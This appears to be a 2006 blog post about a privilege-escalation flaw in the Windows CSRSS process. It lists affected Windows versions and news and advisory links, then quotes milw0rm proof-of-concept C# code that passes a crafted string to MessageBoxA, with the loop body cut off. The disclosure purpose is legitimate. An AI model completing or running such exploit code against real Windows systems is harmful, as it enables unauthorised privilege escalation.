A flaw discovered in the Windows Client/Server Runtime Subsystem (CSRSS) process allows a privilege escalation attack. The flaw was discovered by a Russian guy known as NULL.

Vulnerable systems: Windows 2000/XP/2003/Vista, all fully patched. Who said Vista has no code re-use?

Links:
http://www.securityfocus.com/brief/393
http://www.informationweek.com/story/showArticle.jhtml?articleID=196701757
http://www.symantec.com/enterprise/security_response/weblog/2006/12/vista_vulnerable.html
http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051394.html
http://www.kuban.ru/forum_new/forum2/files/19124.html

Exploit code taken from milw0rm:

```csharp
// mbox.cs
using System;
using System.Runtime.InteropServices;

class HelloWorldFromMicrosoft
{
    [DllImport("user32.dll")]
    unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);

    static unsafe void Main()
    {
        byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
        uint MB_SERVICE_NOTIFICATION = 0x00200000u;
        fixed(byte* pHelloBug = &helloBug[0])
        {
            for(int i=0; i
            // [the remainder of the loop is missing from the quoted post]

// >> csc /unsafe mbox.cs
// >> mbox.exe
// milw0rm.com [2006-12-20]
```

I wonder if it's the same exploit code hackers were selling: http://www.eweek.com/article2/0,1895,2073611,00.asp ...